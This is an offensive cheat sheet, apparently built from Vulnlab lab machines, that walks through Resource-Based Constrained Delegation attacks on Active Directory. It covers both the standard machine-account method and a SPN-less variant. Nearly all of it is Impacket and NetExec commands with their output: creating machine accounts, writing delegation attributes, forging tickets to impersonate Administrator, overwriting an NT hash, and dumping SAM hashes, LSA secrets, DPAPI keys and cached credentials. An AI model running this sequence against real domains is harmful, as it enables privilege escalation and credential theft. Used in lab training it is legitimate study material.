RBCD Enumerate MachineAccountQuota 1 2 3 4 5 ➜ nxc ldap DC01.push.vl -u kelly.hill -p '<REDACTED>' -M maq SMB 10.10.217.5 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:push.vl) (signing:True) (SMBv1:False) LDAP 10.10.217.5 389 DC01 [+] push.vl\kelly.hill:<REDACTED> MAQ 10.10.217.5 389 DC01 [*] Getting the MachineAccountQuota MAQ 10.10.217.5 389 DC01 MachineAccountQuota: 10
Create a new machine account 1 2 3 4 ➜ addcomputer.py -computer-name 'MEOW$' -computer-pass 'Summer2024!' -dc-host push.vl -domain-netbios push.vl push.vl/kelly.hill:'<REDACTED>' Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Successfully added machine account MEOW$ with password Summer2024!.
Read the msDS-AllowedToActOnBehalfOfOtherIdentity attribute 1 2 3 4 ➜ rbcd.py -delegate-to 'MS01$' -dc-ip 10.10.217.5 -action 'read' 'push.vl/kelly.hill:<REDACTED>' Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
Write the attribute 1 2 3 4 5 6 7 8 ➜ rbcd.py -delegate-from 'MEOW$' -delegate-to 'MS01$' -dc-ip 10.10.217.5 -action 'write' 'push.vl/kelly.hill:<REDACTED>' Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty [*] Delegation rights modified successfully! [*] MEOW$ can now impersonate users on MS01$ via S4U2Proxy [*] Accounts allowed to act on behalf of other identity: [*] MEOW$ (S-1-5-21-1451457175-172047642-1427519037-3602)
Obtain a ticket 1 2 3 4 5 6 7 8 9 ➜ getST.py -spn 'cifs/MS01.push.vl' -impersonate Administrator -dc-ip 10.10.217.5 'push.vl/MEOW$:Summer2024!' Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [-] CCache file is not found. Skipping... [*] Getting TGT for user [*] Impersonating Administrator [*] Requesting S4U2self [*] Requesting S4U2Proxy [*] Saving ticket in Administrator.ccache
Pass the ticket 1 ➜ export KRB5CCNAME=Administrator.ccache
1 2 3 4 5 6 7 8 9 10 ➜ secretsdump.py MS01.push.vl -k Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Service RemoteRegistry is in stopped state [*] Starting service RemoteRegistry [*] Target system bootKey: 0x1a2f736cde34f0733b3cc6f7ec68c413 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>::: Guest:501:aad3b435b51404eeaad3b435b51404ee:<REDACTED>::: ...
Using NetExec Or, we can use the netexec --delegate flag to automate the steps
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 ➜ nxc smb 10.10.217.5 -u meow$ -p 'Summer2024!' --delegate Administrator --lsa --sam SMB 10.10.217.5 445 MS01 [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:push.vl) (signing:False) (SMBv1:False) SMB 10.10.217.5 445 MS01 [+] push.vl\Administrator through S4U with meow$ (Pwn3d!) SMB 10.10.217.5 445 MS01 [*] Dumping SAM hashes SMB 10.10.217.5 445 MS01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDCATED>::: SMB 10.10.217.5 445 MS01 Guest:501:aad3b435b51404eeaad3b435b51404ee:<REDCATED>::: SMB 10.10.217.5 445 MS01 DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:<REDCATED>::: SMB 10.10.217.5 445 MS01 WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:<REDCATED>::: SMB 10.10.217.5 445 MS01 [+] Added 4 SAM hashes to the database SMB 10.10.217.5 445 MS01 [+] Dumping LSA secrets SMB 10.10.217.5 445 MS01 PUSH.VL/Administrator:$DCC2$10240#Administrator#3347d36e92ac0b3c7f9c9fff05083e09: (2023-08-31 18:27:31+00:00) SMB 10.10.217.5 445 MS01 PUSH.VL/Kelly.Hill:$DCC2$10240#Kelly.Hill#b084064849c9a1acba2fd9d4e60d6029: (2023-09-02 11:17:04+00:00) SMB 10.10.217.5 445 MS01 PUSH.VL/sccadmin:$DCC2$10240#sccadmin#0c59b319594744abea7f2db17a2fa65c: (2023-08-31 10:26:08+00:00) SMB 10.10.217.5 445 MS01 PUSH\MS01$:plain_password_hex:57003e0053007a00640034007200630056004d004b002a0044003a0047004100200052006f006400550058005e007700360033005a0060007000770071006b002d002a0062006e003a0057004e00560025004b002900310021004800300071005c0047006e004d00270048006d00380020005b003000290063004e0057003f00560075003d0031004200290041006000680059002b0033003e004900450024002e0020004e00480067005d007a003f0049005400650030003f006b006900580020003100790034002400790021003c002500360079006d004a0033003600370067002f002700520054003c005b005300 SMB 10.10.217.5 445 MS01 PUSH\MS01$:aad3b435b51404eeaad3b435b51404ee:ab0442bf644de37c88190ad56cb6e59f::: SMB 10.10.217.5 445 MS01 (Unknown User):<REDCATED> SMB 10.10.217.5 445 MS01 dpapi_machinekey:0x83f7bbd4976dba3418fe397e76d9690c06ee3691 dpapi_userkey:0xe2af091346d181301ff638320e3246e49b9b637c SMB 10.10.217.5 445 MS01 NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695 SMB 10.10.217.5 445 MS01 [+] Dumped 8 LSA secrets to /home/serioton/.nxc/logs/MS01_10.10.217.5_2025-02-13_192354.secrets and /home/serioton/.nxc/logs/MS01_10.10.217.5_2025-02-13_192354.cached
SPN-less RBCD We can perform RBCD even if the MachineAccountQuota is set to 0
1 2 3 4 5 ➜ nxc ldap phantom.vl -u svc_sspr -p '<REDACTED>' -M maq SMB 10.10.123.78 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False) LDAP 10.10.123.78 389 DC [+] phantom.vl\svc_sspr:<REDACTED> MAQ 10.10.123.78 389 DC [*] Getting the MachineAccountQuota MAQ 10.10.123.78 389 DC MachineAccountQuota: 0
Normal RBCD Instead of passing a machine account in the -delegate-from option, we pass a normal user account
1 2 3 4 5 6 7 8 ➜ rbcd.py -delegate-from 'wsilva' -delegate-to 'DC$' -dc-ip '10.10.123.78' -action 'write' 'phantom.vl'/'wsilva':'P@ssw0rd' Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty [*] Delegation rights modified successfully! [*] wsilva can now impersonate users on DC$ via S4U2Proxy [*] Accounts allowed to act on behalf of other identity: [*] wsilva (S-1-5-21-4029599044-1972224926-2225194048-1114)
Obtain a TGT through overpass-the-hash to use RC4 1 2 3 4 ➜ getTGT.py -hashes :$(pypykatz crypto nt 'P@ssw0rd') 'phantom.vl'/'wsilva' Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Saving ticket in wsilva.ccache
1 ➜ export KRB5CCNAME=wsilva.ccache
Obtain the TGT session key 1 2 ➜ describeTicket.py wsilva.ccache | grep 'Ticket Session Key' [*] Ticket Session Key : e826a54fce399da484eae4b39c3bc72a
Change the controlledaccountwithoutSPN’s NT hash with the TGT session key 1 2 3 4 ➜ smbpasswd.py -newhashes :e826a54fce399da484eae4b39c3bc72a 'phantom.vl'/'wsilva':'P@ssw0rd'@'DC.phantom.vl' Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] NTLM hashes were changed successfully.
Obtain the delegated service ticket through S4U2self+U2U, followed by S4U2proxy 1 2 3 4 5 6 7 ➜ getST.py -k -no-pass -u2u -impersonate "Administrator" -spn "cifs/DC.phantom.vl" 'phantom.vl'/'wsilva' Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Impersonating Administrator [*] Requesting S4U2self+U2U [*] Requesting S4U2Proxy [*] Saving ticket in Administrator@cifs_DC.phantom.vl@PHANTOM.VL.ccache
Pass the ticket 1 ➜ export KRB5CCNAME=Administrator@cifs_DC.phantom.vl@PHANTOM.VL.ccache
1 2 3 4 5 6 7 8 9 10 11 12 13 ➜ secretsdump.py DC.phantom.vl -k Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Target system bootKey: 0xa08cda6a38d423ba98b6f79cf6c7880f [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>::: Guest:501:aad3b435b51404eeaad3b435b51404ee:<REDACTED>::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:<REDACTED>::: [-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information. [*] Dumping cached domain logon information (domain/username:hash) [*] Dumping LSA Secrets [*] $MACHINE.ACC ....
Resources
Vulnlab Machines/Chains
Phantom
Heron
Push
Reflection
Bruno
